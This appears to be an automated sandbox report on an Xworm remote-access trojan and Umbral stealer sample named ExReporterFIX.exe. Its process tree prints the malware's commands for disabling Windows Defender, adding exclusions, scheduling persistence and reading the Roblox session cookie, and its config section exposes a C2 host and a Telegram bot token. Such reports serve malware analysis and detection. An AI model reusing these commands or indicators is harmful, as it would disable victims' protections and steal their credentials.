Overview

overview

10

Static

static

10

ExReporterFIX.exe

windows10-1703-x64

10

ExReporterFIX.exe

windows7-x64

10

ExReporterFIX.exe

windows10-2004-x64

10

ExReporterFIX.exe

windows11-21h2-x64

10

Resubmissions

11-08-2024 23:49

240811-3t2svszbkg 10

10-08-2024 12:02

240810-n7h6caybrp 10

Analysis

  • max time kernel
    1769s
  • max time network
    1798s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-08-2024 12:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ExReporterFIX.exe

  • Size

    65KB

  • MD5

    5d36dc879659d7eecf5a0867bbd05165

  • SHA1

    d23b8a98691b5a0379f761ea1669869690e3fd9f

  • SHA256

    4589073aab658c11af8490bc2d39d8b7c6d16e313320a9c67a6cbb7408f8af4a

  • SHA512

    854bc8b9406bcc57cc56ff4d19bae4cc8a18a4fa4f4543c6064413e004a34386dec35dfd617c181d163d5038e068fd442a4eb4a45caa9905c78c29ee210864f4

  • SSDEEP

    1536:kxJhEM7T/hC+xaaGbb05/Txd4j6txHO56197:YJ+MnheaMb0NHO56f7

Score
10/10
umbralxwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

21.ip.gl.ply.gg:21222

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    ExReporters.exe

  • telegram

    https://api.telegram.org/bot7307556336:AAFxy7gvsomu0v1K0jbYvC1K7DBoqhWv9ek/sendMessage?chat_id=1748805076

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 31 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe
    "C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ExReporterFIX.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\ExReporters.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ExReporters.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:636
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ExReporters" /tr "C:\Users\Admin\AppData\Local\ExReporters.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1720
    • C:\Users\Admin\AppData\Local\Temp\bznndx.exe
      "C:\Users\Admin\AppData\Local\Temp\bznndx.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3956
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\bznndx.exe"
        3⤵
        • Views/modifies file attributes
        PID:1412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bznndx.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:312
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1340
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
          PID:1676
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          3⤵
            PID:3376
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
              PID:3920
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4056
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              3⤵
              • Detects videocard installed
              PID:3380
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\bznndx.exe" && pause
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of WriteProcessMemory
              PID:2936
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:2596
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2960
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4500
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3412
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2036
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2952
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:608
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3444
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4768
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:772
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4252
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3128
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3456
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2624
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4660
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4800
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2952
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2432
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1072
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3920
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3536
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2944
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3824
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:5056
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          PID:3144
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          PID:3776
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          PID:3468
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          PID:2492
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          PID:4964
        • C:\Users\Admin\AppData\Local\ExReporters.exe
          C:\Users\Admin\AppData\Local\ExReporters.exe
          1⤵
          • Executes dropped EXE
          PID:692

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Hide Artifacts

        1
        T1564

        Hidden Files and Directories

        1
        T1564.001

        Modify Registry

        1
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Query Registry

        2
        T1012

        Remote System Discovery

        1
        T1018

        System Information Discovery

        3
        T1082

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\ExReporters.exe
          Filesize

          65KB

          MD5

          5d36dc879659d7eecf5a0867bbd05165

          SHA1

          d23b8a98691b5a0379f761ea1669869690e3fd9f

          SHA256

          4589073aab658c11af8490bc2d39d8b7c6d16e313320a9c67a6cbb7408f8af4a

          SHA512

          854bc8b9406bcc57cc56ff4d19bae4cc8a18a4fa4f4543c6064413e004a34386dec35dfd617c181d163d5038e068fd442a4eb4a45caa9905c78c29ee210864f4

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ExReporters.exe.log
          Filesize

          654B

          MD5

          2ff39f6c7249774be85fd60a8f9a245e

          SHA1

          684ff36b31aedc1e587c8496c02722c6698c1c4e

          SHA256

          e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

          SHA512

          1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          a9451a6b9669d49bd90704dff21beb85

          SHA1

          5f93d2dec01a31e04fc90c28eb1c5ca62c6fff80

          SHA256

          b2ff191507379930b97a212f869c3774c20b274e8fc9fcc96da5c154fb0e3056

          SHA512

          06634cb578f6ce8d721e6306004082073fc224b91ceea37ef870df87b12b2d5f59e7d08b20b520787a1d13f3edbbb004197bf70f180f86dd7f401a5ad289ccb5

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          b1a1d8b05525b7b0c5babfd80488c1f2

          SHA1

          c85bbd6b7d0143676916c20fd52720499c2bb5c6

          SHA256

          adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

          SHA512

          346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          948B

          MD5

          bc051b3c05d1eb94762dce48e30f69d2

          SHA1

          014ec7fdc6303d58ead35afc65e186f9c66de9e2

          SHA256

          4849d78ba5085ee3c5fef729f8a6e1c6415333d4a3926370c681946a326c999b

          SHA512

          3d072c51513c71cd28897702dc380e2600a4c60f1d5b4ed59f6340c1f13270043e0a5c14b7aae0fa55a6fcd628456f69248aeb152027c9f6ee15179beb99992b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          e0ec6bf376a6b15852bce768196c5ed0

          SHA1

          05fe4e592ebbb7e29f36b8d30a6a90ba29bd4f81

          SHA256

          2d4a39cbbd597a7cfff477817c3c7c541c14974c8d234b4c0de6d229e3a3ce97

          SHA512

          dc0c7d3d127c88affea9ae402d7358c079cfa7fc3ecb417085e31dc749da1406e72563bfbe42167fdad57e10aa0c6cca7a8ba06921b3a1212ad7ccee1a0f859b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          cdb8c2b334fe77bc7ab6bc2b3b90d7e2

          SHA1

          63c26312120e0e0c327cb46b965851e66686c579

          SHA256

          6cfa9c9d77756fca5f676d2145a789a9584f3302b9c09510415b12f7ff58bc69

          SHA512

          523e496508c4c3acc992dee8a1448af651385c41d3a3e54e6b6ec89332d42f3fc5ed36e50fe20f97fc3a1145debc81db852d23e2888951f46df6652bea69b1e9

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          59d97011e091004eaffb9816aa0b9abd

          SHA1

          1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

          SHA256

          18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

          SHA512

          d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          8ab6456a8ec71255cb9ead0bb5d27767

          SHA1

          bc9ff860086488478e7716f7ac4421e8f69795fb

          SHA256

          bcb14f15fbe23bf51a657c69b24f09cd51e33a2530f89ad17c44f660769611e2

          SHA512

          87c5368dbd7c85f341edf8992d8b1c87984f9a3549a4802c6054da4e12a8674f10f56d03afc1a72b2cfc40895150d3b0f4d9d4c355c79cdf364ace35eb8ebf15

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          1217e8e35e1a0c122e10c69eca21956e

          SHA1

          bf3fcf09f48ce051586b3c67c93a24dc4717cf2a

          SHA256

          43a78bd30c04318ddb374a4b60173d4f2070dcdb212fdc17d819f3a9910c3b2d

          SHA512

          737be617bafd5c739f98ada5d818d5aa70b7b29e5257a2dd9ca7691574788019511388a1a345be22f14fddaa3f1f4c5901d9053dd18a64b8952145a5307ebcae

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdvkwumz.xiz.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\bznndx.exe
          Filesize

          231KB

          MD5

          3849d45ec08cbd9a77c5852372b2689a

          SHA1

          fb26ba243dc3b9016636a40320f8c3b94d152b36

          SHA256

          3e688ce2a65cec47ac034d421726f0dd127a59e4120fe6e8de6fcb34bd8513e1

          SHA512

          6e6c46a416a63dca56147a43ed072a4b1c3db94c516ea24266263e24e9ab34358611dd9d436c09e4d34d26bbbba786c443dcdadacd97bb911f4f8d85ab867d02

          Download Submit

        • memory/3956-126-0x000001AFCA340000-0x000001AFCA390000-memory.dmp

          Filesize

          320KB

          Download

        • memory/3956-100-0x000001AFAFB70000-0x000001AFAFBB0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/3956-125-0x000001AFCA2C0000-0x000001AFCA336000-memory.dmp

          Filesize

          472KB

          Download

        • memory/3956-127-0x000001AFCA390000-0x000001AFCA3AE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3956-163-0x000001AFCA240000-0x000001AFCA24A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3956-164-0x000001AFCA270000-0x000001AFCA282000-memory.dmp

          Filesize

          72KB

          Download

        • memory/4880-58-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4880-68-0x000000001B500000-0x000000001B50C000-memory.dmp

          Filesize

          48KB

          Download

        • memory/4880-0-0x00007FFC5D173000-0x00007FFC5D175000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4880-57-0x00007FFC5D173000-0x00007FFC5D175000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4880-2-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4880-1-0x0000000000870000-0x0000000000886000-memory.dmp

          Filesize

          88KB

          Download

        • memory/5076-18-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5076-15-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5076-14-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/5076-3-0x000002A2C45C0000-0x000002A2C45E2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/5076-4-0x00007FFC5D170000-0x00007FFC5DC31000-memory.dmp

          Filesize

          10.8MB

          Download